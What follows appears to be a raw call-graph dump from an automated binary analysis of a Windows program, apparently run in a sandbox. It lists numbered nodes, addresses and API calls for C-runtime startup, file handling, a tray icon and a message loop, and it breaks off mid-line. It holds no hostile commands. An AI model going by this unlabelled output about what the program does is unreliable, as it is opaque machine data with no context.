__NMSG_WRITE 101232->101235 101233->101166 101234 2787d5 __calloc_crt 58 API calls 101242 284d9a __NMSG_WRITE 101234->101242 101235->101234 101236 284df1 101237 272d55 _free 58 API calls 101236->101237 101237->101233 101238 2787d5 __calloc_crt 58 API calls 101238->101242 101239 284e16 101240 272d55 _free 58 API calls 101239->101240 101240->101233 101242->101233 101242->101236 101242->101238 101242->101239 101243 284e2d 101242->101243 101301 284607 58 API calls __cftoa_l 101242->101301 101302 278dc6 IsProcessorFeaturePresent 101243->101302 101245 284e39 101245->101166 101247 2730fb __IsNonwritableInCurrentImage 101246->101247 101325 27a4d1 101247->101325 101249 273119 __initterm_e 101250 272d40 __cinit 67 API calls 101249->101250 101251 273138 _doexit __IsNonwritableInCurrentImage 101249->101251 101250->101251 101251->101170 101253 2547ea 101252->101253 101263 254889 101252->101263 101254 254824 IsThemeActive 101253->101254 101328 27336c 101254->101328 101258 254850 101340 2548fd SystemParametersInfoW SystemParametersInfoW 101258->101340 101260 25485c 101341 253b3a 101260->101341 101262 254864 SystemParametersInfoW 101262->101263 101263->101174 101264->101148 101265->101152 101266->101159 101270->101175 101271->101178 101272->101184 101273->101187 101274->101190 101275->101191 101277 2787dc 101276->101277 101279 278817 101277->101279 101281 2787fa 101277->101281 101285 2851f6 101277->101285 101279->101195 101282 279de6 TlsSetValue 101279->101282 101281->101277 101281->101279 101293 27a132 Sleep 101281->101293 101282->101198 101283->101202 101284->101199 101286 285201 101285->101286 101290 28521c 101285->101290 101287 28520d 101286->101287 101286->101290 101294 278b28 58 API calls __getptd_noexit 101287->101294 101289 28522c RtlAllocateHeap 101289->101290 101291 285212 101289->101291 101290->101289 101290->101291 101295 2733a1 DecodePointer 101290->101295 101291->101277 101293->101281 101294->101291 101295->101290 101296->101218 101297->101214 101298->101210 101299->101227 101300->101231 101301->101242 101303 278dd1 101302->101303 101308 278c59 101303->101308 101307 278dec 101307->101245 101309 278c73 _memset ___raise_securityfailure 101308->101309 101310 278c93 IsDebuggerPresent 101309->101310 101316 27a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101310->101316 101313 278d57 ___raise_securityfailure 101317 27c5f6 101313->101317 101314 278d7a 101315 27a140 GetCurrentProcess TerminateProcess 101314->101315 101315->101307 101316->101313 101318 27c600 IsProcessorFeaturePresent 101317->101318 101319 27c5fe 101317->101319 101321 28590a 101318->101321 101319->101314 101324 2858b9 5 API calls 2 library calls 101321->101324 101323 2859ed 101323->101314 101324->101323 101326 27a4d4 EncodePointer 101325->101326 101326->101326 101327 27a4ee 101326->101327 101327->101249 101329 279c0b __lock 58 API calls 101328->101329 101330 273377 DecodePointer EncodePointer 101329->101330 101393 279d75 LeaveCriticalSection 101330->101393 101332 254849 101333 2733d4 101332->101333 101334 2733de 101333->101334 101335 2733f8 101333->101335 101334->101335 101394 278b28 58 API calls __getptd_noexit 101334->101394 101335->101258 101337 2733e8 101395 278db6 9 API calls __cftoa_l 101337->101395 101339 2733f3 101339->101258 101340->101260 101342 253b47 __write_nolock 101341->101342 101343 257667 59 API calls 101342->101343 101344 253b51 GetCurrentDirectoryW 101343->101344 101396 253766 101344->101396 101346 253b7a IsDebuggerPresent 101347 28d272 MessageBoxA 101346->101347 101348 253b88 101346->101348 101350 28d28c 101347->101350 101348->101350 101351 253ba5 101348->101351 101380 253c61 101348->101380 101349 253c68 SetCurrentDirectoryW 101354 253c75 Mailbox 101349->101354 101615 257213 59 API calls Mailbox 101350->101615 101477 257285 101351->101477 101354->101262 101355 28d29c 101360 28d2b2 SetCurrentDirectoryW 101355->101360 101357 253bc3 GetFullPathNameW 101493 257bcc 101357->101493 101359 253bfe 101502 26092d 101359->101502 101360->101354 101363 253c1c 101364 253c26 101363->101364 101616 2a874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101363->101616 101518 253a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101364->101518 101367 28d2cf 101367->101364 101371 28d2e0 101367->101371 101370 253c30 101372 253c43 101370->101372 101526 25434a 101370->101526 101617 254706 101371->101617 101537 2609d0 101372->101537 101374 28d2e8 101624 257de1 101374->101624 101378 253c4e 101378->101380 101614 25443a Shell_NotifyIconW _memset 101378->101614 101379 28d2f5 101381 28d2ff 101379->101381 101382 28d324 101379->101382 101380->101349 101628 257cab 101381->101628 101385 257cab 59 API calls 101382->101385 101387 28d320 GetForegroundWindow ShellExecuteW 101385->101387 101391 28d354 Mailbox 101387->101391 101391->101380 101392 257cab 59 API calls 101392->101387 101393->101332 101394->101337 101395->101339 101397 257667 59 API calls 101396->101397 101398 25377c 101397->101398 101644 253d31 101398->101644 101400 25379a 101401 254706 61 API calls 101400->101401 101402 2537ae 101401->101402 101403 257de1 59 API calls 101402->101403 101404 2537bb 101403->101404 101658 254ddd 101404->101658 101407 2537dc Mailbox 101682 258047 101407->101682 101408 28d173 101729 2b955b 101408->101729 101411 28d192 101414 272d55 _free 58 API calls 101411->101414 101417 28d19f 101414->101417 101418 254e4a 84 API calls 101417->101418 101420 28d1a8 101418->101420 101424 253ed0 59 API calls 101420->101424 101421 257de1 59 API calls 101422 253808 101421->101422 101689 2584c0 101422->101689 101426 28d1c3 101424->101426 101425 25381a Mailbox 101427 257de1 59 API calls 101425->101427 101428 253ed0 59 API calls 101426->101428 101429 253840 101427->101429 101430 28d1df 101428->101430 101431 2584c0 69 API calls 101429->101431 101432 254706 61 API calls 101430->101432 101434 25384f Mailbox 101431->101434 101433 28d204 101432->101433 101435 253ed0 59 API calls 101433->101435 101436 257667 59 API calls 101434->101436 101437 28d210 101435->101437 101439 25386d 101436->101439 101438 258047 59 API calls 101437->101438 101440 28d21e 101438->101440 101693 253ed0 101439->101693 101442 253ed0 59 API calls 101440->101442 101444 28d22d 101442->101444 101450 258047 59 API calls 101444->101450 101446 253887 101446->101420 101447 253891 101446->101447 101448 272efd _W_store_winword 60 API calls 101447->101448 101449 25389c 101448->101449 101449->101426 101451 2538a6 101449->101451 101452 28d24f 101450->101452 101453 272efd _W_store_winword 60 API calls 101451->101453 101454 253ed0 59 API calls 101452->101454 101455 2538b1 101453->101455 101456 28d25c 101454->101456 101455->101430 101457 2538bb 101455->101457 101456->101456 101458 272efd _W_store_winword 60 API calls 101457->101458 101459 2538c6 101458->101459 101459->101444 101460 253907 101459->101460 101462 253ed0 59 API calls 101459->101462 101460->101444 101461 253914 101460->101461 101709 2592ce 101461->101709 101463 2538ea 101462->101463 101465 258047 59 API calls 101463->101465 101467 2538f8 101465->101467 101469 253ed0 59 API calls 101467->101469 101469->101460 101472 25928a 59 API calls 101474 25394f 101472->101474 101473 258ee0 60 API calls 101473->101474 101474->101472 101474->101473 101475 253ed0 59 API calls 101474->101475 101476 253995 Mailbox 101474->101476 101475->101474 101476->101346 101478 257292 __write_nolock 101477->101478 101479 28ea22 _memset 101478->101479 101480 2572ab 101478->101480 101482 28ea3e GetOpenFileNameW 101479->101482 102362 254750 101480->102362 101484 28ea8d 101482->101484 101487 257bcc 59 API calls 101484->101487 101489 28eaa2 101487->101489 101489->101489 101490 2572c9 102390 25686a 101490->102390 101494 257c45 101493->101494 101495 257bd8 __NMSG_WRITE 101493->101495 101496 257d2c 59 API calls 101494->101496 101497 257c13 101495->101497 101498 257bee 101495->101498 101501 257bf6 _memmove 101496->101501 101500 258029 59 API calls 101497->101500 102659 257f27 59 API calls Mailbox 101498->102659 101500->101501 101501->101359 101503 26093a __write_nolock 101502->101503 102660 256d80 101503->102660 101505 26093f 101517 253c14 101505->101517 102671 26119e 89 API calls 101505->102671 101507 26094c 101507->101517 102672 263ee7 91 API calls Mailbox 101507->102672 101509 260955 101510 260959 GetFullPathNameW 101509->101510 101509->101517 101511 257bcc 59 API calls 101510->101511 101512 260985 101511->101512 101513 257bcc 59 API calls 101512->101513 101514 260992 101513->101514 101515 294cab _wcscat 101514->101515 101516 257bcc 59 API calls 101514->101516 101516->101517 101517->101355 101517->101363 101519 253ab0 LoadImageW RegisterClassExW 101518->101519 101520 28d261 101518->101520 102710 253041 7 API calls 101519->102710 102711 2547a0 LoadImageW EnumResourceNamesW 101520->102711 101523 253b34 101525 2539d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101523->101525 101524 28d26a 101525->101370 101527 254375 _memset 101526->101527 102712 254182 101527->102712 101531 254414 Shell_NotifyIconW 101534 254422 101531->101534 101532 254430 Shell_NotifyIconW 101532->101534 101533 2543fa 101533->101531 101533->101532 102716 25407c 101534->102716 101536 254429 101536->101372 101538 294cc3 101537->101538 101552 2609f5 101537->101552 102874 2b9e4a 89 API calls 4 library calls 101538->102874 101540 260cfa 101540->101378 101542 260ee4 101542->101540 101544 260ef1 101542->101544 102872 261093 331 API calls Mailbox 101544->102872 101545 260a4b PeekMessageW 101603 260a05 Mailbox 101545->101603 101547 260ef8 LockWindowUpdate DestroyWindow GetMessageW 101547->101540 101550 260f2a 101547->101550 101549 294e81 Sleep 101549->101603 101554 295c58 TranslateMessage DispatchMessageW GetMessageW 101550->101554 101551 260ce4 101551->101540 102871 261070 10 API calls Mailbox 101551->102871 101552->101603 102875 259e5d 60 API calls 101552->102875 102876 2a6349 331 API calls 101552->102876 101554->101554 101555 295c88 101554->101555 101555->101540 101556 260ea5 TranslateMessage DispatchMessageW 101557 260e43 PeekMessageW 101556->101557 101557->101603 101558 294d50 TranslateAcceleratorW 101558->101557 101558->101603 101559 270db6 59 API calls Mailbox 101559->101603 101560 260d13 timeGetTime 101560->101603 101561 29581f WaitForSingleObject 101563 29583c GetExitCodeProcess CloseHandle 101561->101563 101561->101603 101598 260f95 101563->101598 101564 260e5f Sleep 101597 260e70 Mailbox 101564->101597 101565 258047 59 API calls 101565->101603 101566 257667 59 API calls 101566->101597 101568 295af8 Sleep 101568->101597 101570 25b73c 304 API calls 101570->101603 101571 27049f timeGetTime 101571->101597 101572 260f4e timeGetTime 102873 259e5d 60 API calls 101572->102873 101575 295b8f GetExitCodeProcess 101577 295bbb CloseHandle 101575->101577 101578 295ba5 WaitForSingleObject 101575->101578 101577->101597 101578->101577 101578->101603 101581 2d5f25 110 API calls 101581->101597 101582 25b7dd 109 API calls 101582->101597 101583 295874 101583->101598 101584 295c17 Sleep 101584->101603 101585 295078 Sleep 101585->101603 101587 257de1 59 API calls 101587->101597 101590 259e5d 60 API calls 101590->101603 101593 259ea0 304 API calls 101593->101603 101597->101566 101597->101571 101597->101575 101597->101581 101597->101582 101597->101583 101597->101584 101597->101585 101597->101587 101597->101598 101597->101603 102901 2b2408 60 API calls 101597->102901 102902 259e5d 60 API calls 101597->102902 102903 2589b3 69 API calls Mailbox 101597->102903 102904 25b73c 331 API calls 101597->102904 102905 2a64da 60 API calls 101597->102905 102906 2b5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101597->102906 102907 2b3c55 66 API calls Mailbox 101597->102907 101598->101378 101600 2b9e4a 89 API calls 101600->101603 101602 259c90 59 API calls Mailbox 101602->101603 101603->101545 101603->101549 101603->101551 101603->101556 101603->101557 101603->101558 101603->101559 101603->101560 101603->101561 101603->101564 101603->101565 101603->101568 101603->101570 101603->101572 101603->101590 101603->101593 101603->101597 101603->101598 101603->101600 101603->101602 101604 2584c0 69 API calls 101603->101604 101606 2a617e 59 API calls Mailbox 101603->101606 101607 2955d5 VariantClear 101603->101607 101608 29566b VariantClear 101603->101608 101609 258cd4 59 API calls Mailbox 101603->101609 101610 295419 VariantClear 101603->101610 101611 2a6e8f 59 API calls 101603->101611 101612 257de1 59 API calls 101603->101612 101613 2589b3 69 API calls 101603->101613 102739 25e6a0 101603->102739 102770 25f460 101603->102770 102789 25fce0 101603->102789 102869 25e420 331 API calls 101603->102869 102870 2531ce IsDialogMessageW GetClassLongW 101603->102870 102877 2d6018 59 API calls 101603->102877 102878 2b9a15 59 API calls Mailbox 101603->102878 102879 2ad4f2 59 API calls 101603->102879 102880 259837 101603->102880 102898 2a60ef 59 API calls 2 library calls 101603->102898 102899 258401 59 API calls 101603->102899 102900 2582df 59 API calls Mailbox 101603->102900 101604->101603 101606->101603 101607->101603 101608->101603 101609->101603 101610->101603 101611->101603 101612->101603 101613->101603 101614->101380 101615->101355 101616->101367 101618 281940 __write_nolock 101617->101618 101619 254713 GetModuleFileNameW 101618->101619 101620 257de1 59 API calls 101619->101620 101621 254739 101620->101621 101622 254750 60 API calls 101621->101622 101623 254743 Mailbox 101622->101623 101623->101374 101625 257df0 __NMSG_WRITE _memmove 101624->101625 101626 270db6 Mailbox 59 API calls 101625->101626 101627 257e2e 101626->101627 101627->101379 101629 28ed4a 101628->101629 101630 257cbf 101628->101630 101632 258029 59 API calls 101629->101632 103244 257c50 101630->103244 101634 28ed55 __NMSG_WRITE _memmove 101632->101634 101633 257cca 101635 257b2e 101633->101635 101636 28ec6b 101635->101636 101637 257b40 101635->101637 103255 2a7bdb 59 API calls _memmove 101636->103255 103249 257a51 101637->103249 101640 257b4c 101640->101392 101641 28ec75 101642 258047 59 API calls 101641->101642 101643 28ec7d Mailbox 101642->101643 101645 253d3e __write_nolock 101644->101645 101646 257bcc 59 API calls 101645->101646 101651 253ea4 Mailbox 101645->101651 101648 253d70 101646->101648 101657 253da6 Mailbox 101648->101657 101770 2579f2 101648->101770 101649 2579f2 59 API calls 101649->101657 101650 253e77 101650->101651 101652 257de1 59 API calls 101650->101652 101651->101400 101654 253e98 101652->101654 101653 257de1 59 API calls 101653->101657 101655 253f74 59 API calls 101654->101655 101655->101651 101657->101649 101657->101650 101657->101651 101657->101653 101773 253f74 101657->101773 101783 254bb5 101658->101783 101663 254e08 LoadLibraryExW 101793 254b6a 101663->101793 101664 28d8e6 101665 254e4a 84 API calls 101664->101665 101667 28d8ed 101665->101667 101669 254b6a 3 API calls 101667->101669 101671 28d8f5 101669->101671 101819 254f0b 101671->101819 101672 254e2f 101672->101671 101673 254e3b 101672->101673 101675 254e4a 84 API calls 101673->101675 101677 2537d4 101675->101677 101677->101407 101677->101408 101679 28d91c 101827 254ec7 101679->101827 101681 28d929 101683 258052 101682->101683 101684 2537ef 101682->101684 102081 257f77 59 API calls 2 library calls 101683->102081 101686 25928a 101684->101686 101687 270db6 Mailbox 59 API calls 101686->101687 101688 2537fb 101687->101688 101688->101421 101690 2584cb 101689->101690 101692 2584f2 101690->101692 102082 2589b3 69 API calls Mailbox 101690->102082 101692->101425 101694 253ef3 101693->101694 101695 253eda 101693->101695 101697 257bcc 59 API calls 101694->101697 101696 258047 59 API calls 101695->101696 101698 253879 101696->101698 101697->101698 101699 272efd 101698->101699 101700 272f7e 101699->101700 101701 272f09 101699->101701 102085 272f90 60 API calls 3 library calls 101700->102085 101708 272f2e 101701->101708 102083 278b28 58 API calls __getptd_noexit 101701->102083 101704 272f8b 101704->101446 101705 272f15 102084 278db6 9 API calls __cftoa_l 101705->102084 101707 272f20 101707->101446 101708->101446 101710 2592d6 101709->101710 101711 270db6 Mailbox 59 API calls 101710->101711 101712 2592e4 101711->101712 101713 253924 101712->101713 102086 2591fc 59 API calls Mailbox 101712->102086 101715 259050 101713->101715 102087 259160 101715->102087 101717 270db6 Mailbox 59 API calls 101719 253932 101717->101719 101718 25905f 101718->101717 101718->101719 101720 258ee0 101719->101720 101721 28f17c 101720->101721 101723 258ef7 101720->101723 101721->101723 102097 258bdb 59 API calls Mailbox 101721->102097 101724 259040 101723->101724 101725 258ff8 101723->101725 101728 258fff 101723->101728 102096 259d3c 60 API calls Mailbox 101724->102096 101727 270db6 Mailbox 59 API calls 101725->101727 101727->101728 101728->101474 101730 254ee5 85 API calls 101729->101730 101731 2b95ca 101730->101731 102098 2b9734 101731->102098 101734 254f0b 74 API calls 101735 2b95f7 101734->101735 101736 254f0b 74 API calls 101735->101736 101737 2b9607 101736->101737 101738 254f0b 74 API calls 101737->101738 101739 2b9622 101738->101739 101740 254f0b 74 API calls 101739->101740 101741 2b963d 101740->101741 101742 254ee5 85 API calls 101741->101742 101743 2b9654 101742->101743 101744 27571c __crtLCMapStringA_stat 58 API calls 101743->101744 101745 2b965b 101744->101745 101746 27571c __crtLCMapStringA_stat 58 API calls 101745->101746 101747 2b9665 101746->101747 101748 254f0b 74 API calls 101747->101748 101749 2b9679 101748->101749 101750 2b9109 GetSystemTimeAsFileTime 101749->101750 101751 2b968c 101750->101751 101752 2b96a1 101751->101752 101753 2b96b6 101751->101753 101756 272d55 _free 58 API calls 101752->101756 101754 2b971b 101753->101754 101755 2b96bc 101753->101755 101758 272d55 _free 58 API calls 101754->101758 102104 2b8b06 116 API calls __fcloseall 101755->102104 101759 2b96a7 101756->101759 101761 28d186 101758->101761 101762 272d55 _free 58 API calls 101759->101762 101760 2b9713 101763 272d55 _free 58 API calls 101760->101763 101761->101411 101764 254e4a 101761->101764 101762->101761 101763->101761 101765 254e54 101764->101765 101769 254e5b 101764->101769 102105 2753a6 101765->102105 101767 254e7b FreeLibrary 101768 254e6a 101767->101768 101768->101411 101769->101767 101769->101768 101779 257e4f 101770->101779 101772 2579fd 101772->101648 101774 253f82 101773->101774 101778 253fa4 _memmove 101773->101778 101776 270db6 Mailbox 59 API calls 101774->101776 101775 270db6 Mailbox 59 API calls 101777 253fb8 101775->101777 101776->101778 101777->101657 101778->101775 101780 257e62 101779->101780 101782 257e5f _memmove 101779->101782 101781 270db6 Mailbox 59 API calls 101780->101781 101781->101782 101782->101772 101832 254c03 101783->101832 101786 254bdc 101788 254bf5 101786->101788 101789 254bec FreeLibrary 101786->101789 101787 254c03 2 API calls 101787->101786 101790 27525b 101788->101790 101789->101788 101836 275270 101790->101836 101792 254dfc 101792->101663 101792->101664 101996 254c36 101793->101996 101796 254b8f 101797 254ba1 FreeLibrary 101796->101797 101798 254baa 101796->101798 101797->101798 101800 254c70 101798->101800 101799 254c36 2 API calls 101799->101796 101801 270db6 Mailbox 59 API calls 101800->101801 101802 254c85 101801->101802 102000 25522e 101802->102000 101804 254c91 _memmove 101805 254ccc 101804->101805 101806 254dc1 101804->101806 101807 254d89 101804->101807 101808 254ec7 69 API calls 101805->101808 102014 2b991b 95 API calls 101806->102014 102003 254e89 CreateStreamOnHGlobal 101807->102003 101816 254cd5 101808->101816 101811 254f0b 74 API calls 101811->101816 101812 254d69 101812->101672 101814 28d8a7 101815 254ee5 85 API calls 101814->101815 101817 28d8bb 101815->101817 101816->101811 101816->101812 101816->101814 102009 254ee5 101816->102009 101818 254f0b 74 API calls 101817->101818 101818->101812 101820 254f1d 101819->101820 101823 28d9cd 101819->101823 102038 2755e2 101820->102038 101824 2b9109 102058 2b8f5f 101824->102058 101826 2b911f 101826->101679 101828 254ed6 101827->101828 101829 28d990 101827->101829 102063 275c60 101828->102063 101831 254ede 101831->101681 101833 254bd0 101832->101833 101834 254c0c LoadLibraryA 101832->101834 101833->101786 101833->101787 101834->101833 101835 254c1d GetProcAddress 101834->101835 101835->101833 101839 27527c __getstream 101836->101839 101837 27528f 101885 278b28 58 API calls __getptd_noexit 101837->101885 101839->101837 101841 2752c0 101839->101841 101840 275294 101886 278db6 9 API calls __cftoa_l 101840->101886 101855 2804e8 101841->101855 101844 2752c5 101845 2752ce 101844->101845 101846 2752db 101844->101846 101887 278b28 58 API calls __getptd_noexit 101845->101887 101848 275305 101846->101848 101849 2752e5 101846->101849 101870 280607 101848->101870 101888 278b28 58 API calls __getptd_noexit 101849->101888 101850 27529f @_EH4_CallFilterFunc@8 __getstream 101850->101792 101856 2804f4 __getstream 101855->101856 101857 279c0b __lock 58 API calls 101856->101857 101868 280502 101857->101868 101858 280576 101890 2805fe 101858->101890 101859 28057d 101895 27881d 58 API calls 2 library calls 101859->101895 101862 2805f3 __getstream 101862->101844 101863 280584 101863->101858 101896 279e2b InitializeCriticalSectionAndSpinCount 101863->101896 101865 279c93 __mtinitlocknum 58 API calls 101865->101868 101867 2805aa EnterCriticalSection 101867->101858 101868->101858 101868->101859 101868->101865 101893 276c50 59 API calls __lock 101868->101893 101894 276cba LeaveCriticalSection LeaveCriticalSection _doexit 101868->101894 101878 280627 __wopenfile 101870->101878 101871 280641 101901 278b28 58 API calls __getptd_noexit 101871->101901 101873 280646 101902 278db6 9 API calls __cftoa_l 101873->101902 101874 2807fc 101874->101871 101877 28085f 101874->101877 101876 275310 101889 275332 LeaveCriticalSection LeaveCriticalSection _fprintf 101876->101889 101898 2885a1 101877->101898 101878->101871 101878->101874 101903 2737cb 60 API calls 2 library calls 101878->101903 101881 2807f5 101881->101874 101904 2737cb 60 API calls 2 library calls 101881->101904 101883 280814 101883->101874 101905 2737cb 60 API calls 2 library calls 101883->101905 101885->101840 101886->101850 101887->101850 101888->101850 101889->101850 101897 279d75 LeaveCriticalSection 101890->101897 101892 280605 101892->101862 101893->101868 101894->101868 101895->101863 101896->101867 101897->101892 101906 287d85 101898->101906 101900 2885ba 101900->101876 101901->101873 101902->101876 101903->101881 101904->101883 101905->101874 101907 287d91 __getstream 101906->101907 101908 287da7 101907->101908 101911 287ddd 101907->101911 101993 278b28 58 API calls __getptd_noexit 101908->101993 101910 287dac 101994 278db6 9 API calls __cftoa_l 101910->101994 101917 287e4e 101911->101917 101914 287df9 101995 287e22 LeaveCriticalSection __unlock_fhandle 101914->101995 101915 287db6 __getstream 101915->101900 101918 287e6e 101917->101918 101919 2744ea __wsopen_nolock 58 API calls 101918->101919 101923 287e8a 101919->101923 101920 287fc1 101921 278dc6 __invoke_watson 8 API calls 101920->101921 101922 2885a0 101921->101922 101924 287d85 __wsopen_helper 103 API calls 101922->101924 101923->101920 101925 287ec4 101923->101925 101931 287ee7 101923->101931 101926 2885ba 101924->101926 101927 278af4 __close 58 API calls 101925->101927 101926->101914 101928 287ec9 101927->101928 101929 278b28 __cftoa_l 58 API calls 101928->101929 101930 287ed6 101929->101930 101933 278db6 __cftoa_l 9 API calls 101930->101933 101932 287fa5 101931->101932 101940 287f83 101931->101940 101934 278af4 __close 58 API calls 101932->101934 101935 287ee0 101933->101935 101936 287faa 101934->101936 101935->101914 101937 278b28 __cftoa_l 58 API calls 101936->101937 101938 287fb7 101937->101938 101939 278db6 __cftoa_l 9 API calls 101938->101939 101939->101920 101941 27d294 __alloc_osfhnd 61 API calls 101940->101941 101942 288051 101941->101942 101943 28805b 101942->101943 101944 28807e 101942->101944 101946 278af4 __close 58 API calls 101943->101946 101945 287cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101944->101945 101955 2880a0 101945->101955 101947 288060 101946->101947 101949 278b28 __cftoa_l 58 API calls 101947->101949 101948 28811e GetFileType 101950 288129 GetLastError 101948->101950 101951 28816b 101948->101951 101953 28806a 101949->101953 101954 278b07 __dosmaperr 58 API calls 101950->101954 101963 27d52a __set_osfhnd 59 API calls 101951->101963 101952 2880ec GetLastError 101956 278b07 __dosmaperr 58 API calls 101952->101956 101957 278b28 __cftoa_l 58 API calls 101953->101957 101958 288150 CloseHandle 101954->101958 101955->101948 101955->101952 101959 287cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101955->101959 101960 288111 101956->101960 101957->101935 101958->101960 101961 28815e 101958->101961 101962 2880e1 101959->101962 101965 278b28 __cftoa_l 58 API calls 101960->101965 101964 278b28 __cftoa_l 58 API calls 101961->101964 101962->101948 101962->101952 101968 288189 101963->101968 101966 288163 101964->101966 101965->101920 101966->101960 101967 288344 101967->101920 101971 288517 CloseHandle 101967->101971 101968->101967 101969 2818c1 __lseeki64_nolock 60 API calls 101968->101969 101986 28820a 101968->101986 101970 2881f3 101969->101970 101974 278af4 __close 58 API calls 101970->101974 101990 288212 101970->101990 101972 287cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101971->101972 101973 28853e 101972->101973 101975 2883ce 101973->101975 101976 288546 GetLastError 101973->101976 101974->101986 101975->101920 101977 278b07 __dosmaperr 58 API calls 101976->101977 101979 288552 101977->101979 101978 2818c1 60 API calls __lseeki64_nolock 101978->101990 101982 27d43d __free_osfhnd 59 API calls 101979->101982 101980 280add __close_nolock 61 API calls 101980->101990 101981 280e5b 70 API calls __read_nolock 101981->101990 101982->101975 101983 2897a2 __chsize_nolock 82 API calls 101983->101990 101984 27d886 __write 78 API calls 101984->101986 101985 2818c1 60 API calls __lseeki64_nolock 101985->101986 101986->101967 101986->101984 101986->101985 101986->101990 101987 2883c1 101989 280add __close_nolock 61 API calls 101987->101989 101988 2883aa 101988->101967 101991 2883c8 101989->101991 101990->101978 101990->101980 101990->101981 101990->101983 101990->101986 101990->101987 101990->101988 101992 278b28 __cftoa_l 58 API calls 101991->101992 101992->101975 101993->101910 101994->101915 101995->101915 101997 254b83 101996->101997 101998 254c3f LoadLibraryA 101996->101998 101997->101796 101997->101799 101998->101997 101999 254c50 GetProcAddress 101998->101999 101999->101997 102001 270db6 Mailbox 59 API calls 102000->102001 102002 255240 102001->102002 102002->101804 102004 254ea3 FindResourceExW 102003->102004 102005 254ec0 102003->102005 102004->102005 102006 28d933 LoadResource 102004->102006 102005->101805 102006->102005 102007 28d948 SizeofResource 102006->102007 102007->102005 102008 28d95c LockResource 102007->102008 102008->102005 102010 254ef4 102009->102010 102011 28d9ab 102009->102011 102015 27584d 102010->102015 102013 254f02 102013->101816 102014->101805 102016 275859 __getstream 102015->102016 102017 27586b 102016->102017 102019 275891 102016->102019 102028 278b28 58 API calls __getptd_noexit 102017->102028 102030 276c11 102019->102030 102021 275870 102029 278db6 9 API calls __cftoa_l 102021->102029 102022 275897 102036 2757be 83 API calls 5 library calls 102022->102036 102025 2758a6 102037 2758c8 LeaveCriticalSection LeaveCriticalSection _fprintf 102025->102037 102027 27587b __getstream 102027->102013 102028->102021 102029->102027 102031 276c43 EnterCriticalSection 102030->102031 102032 276c21 102030->102032 102034 276c39 102031->102034 102032->102031 102033 276c29 102032->102033 102035 279c0b __lock 58 API calls 102033->102035 102034->102022 102035->102034 102036->102025 102037->102027 102041 2755fd 102038->102041 102040 254f2e 102040->101824 102042 275609 __getstream 102041->102042 102043 27561f _memset 102042->102043 102044 27564c 102042->102044 102045 275644 __getstream 102042->102045 102054 278b28 58 API calls __getptd_noexit 102043->102054 102046 276c11 __lock_file 59 API calls 102044->102046 102045->102040 102047 275652 102046->102047 102056 27541d 72 API calls 6 library calls 102047->102056 102050 275639 102055 278db6 9 API calls __cftoa_l 102050->102055 102051 275668 102057 275686 LeaveCriticalSection LeaveCriticalSection _fprintf 102051->102057 102054->102050 102055->102045 102056->102051 102057->102045 102061 27520a GetSystemTimeAsFileTime 102058->102061 102060 2b8f6e 102060->101826 102062 275238 __aulldiv 102061->102062 102062->102060 102064 275c6c __getstream 102063->102064 102065 275c93 102064->102065 102066 275c7e 102064->102066 102068 276c11 __lock_file 59 API calls 102065->102068 102077 278b28 58 API calls __getptd_noexit 102066->102077 102070 275c99 102068->102070 102069 275c83 102078 278db6 9 API calls __cftoa_l 102069->102078 102079 2758d0 67 API calls 6 library calls 102070->102079 102073 275ca4 102080 275cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 102073->102080 102075 275cb6 102076 275c8e __getstream 102075->102076 102076->101831 102077->102069 102078->102076 102079->102073 102080->102075 102081->101684 102082->101692 102083->101705 102084->101707 102085->101704 102086->101713 102088 259169 Mailbox 102087->102088 102089 28f19f 102088->102089 102094 259173 102088->102094 102090 270db6 Mailbox 59 API calls 102089->102090 102091 28f1ab 102090->102091 102092 25917a 102092->101718 102094->102092 102095 259c90 59 API calls Mailbox 102094->102095 102095->102094 102096->101728 102097->101723 102103 2b9748 __tzset_nolock _wcscmp 102098->102103 102099 254f0b 74 API calls 102099->102103 102100 2b95dc 102100->101734 102100->101761 102101 2b9109 GetSystemTimeAsFileTime 102101->102103 102102 254ee5 85 API calls 102102->102103 102103->102099 102103->102100 102103->102101 102103->102102 102104->101760 102106 2753b2 __getstream 102105->102106 102107 2753c6 102106->102107 102108 2753de 102106->102108 102134 278b28 58 API calls __getptd_noexit 102107->102134 102111 276c11 __lock_file 59 API calls 102108->102111 102114 2753d6 __getstream 102108->102114 102110 2753cb 102135 278db6 9 API calls __cftoa_l 102110->102135 102113 2753f0 102111->102113 102118 27533a 102113->102118 102114->101769 102119 27535d 102118->102119 102120 275349 102118->102120 102132 275359 102119->102132 102137 274a3d 102119->102137 102180 278b28 58 API calls __getptd_noexit 102120->102180 102122 27534e 102181 278db6 9 API calls __cftoa_l 102122->102181 102129 275377 102154 280a02 102129->102154 102131 27537d 102131->102132 102133 272d55 _free 58 API calls 102131->102133 102136 275415 LeaveCriticalSection LeaveCriticalSection _fprintf 102132->102136 102133->102132 102134->102110 102135->102114 102136->102114 102138 274a50 102137->102138 102142 274a74 102137->102142 102139 2746e6 __output_l 58 API calls 102138->102139 102138->102142 102140 274a6d 102139->102140 102182 27d886 102140->102182 102143 280b77 102142->102143 102144 275371 102143->102144 102145 280b84 102143->102145 102147 2746e6 102144->102147 102145->102144 102146 272d55 _free 58 API calls 102145->102146 102146->102144 102148 274705 102147->102148 102149 2746f0 102147->102149 102148->102129 102317 278b28 58 API calls __getptd_noexit 102149->102317 102151 2746f5 102318 278db6 9 API calls __cftoa_l 102151->102318 102153 274700 102153->102129 102155 280a0e __getstream 102154->102155 102156 280a1b 102155->102156 102157 280a32 102155->102157 102334 278af4 58 API calls __getptd_noexit 102156->102334 102159 280abd 102157->102159 102162 280a42 102157->102162 102339 278af4 58 API calls __getptd_noexit 102159->102339 102161 280a20 102335 278b28 58 API calls __getptd_noexit 102161->102335 102163 280a6a 102162->102163 102164 280a60 102162->102164 102168 27d206 ___lock_fhandle 59 API calls 102163->102168 102336 278af4 58 API calls __getptd_noexit 102164->102336 102165 280a65 102340 278b28 58 API calls __getptd_noexit 102165->102340 102171 280a70 102168->102171 102169 280a27 __getstream 102169->102131 102173 280a8e 102171->102173 102174 280a83 102171->102174 102172 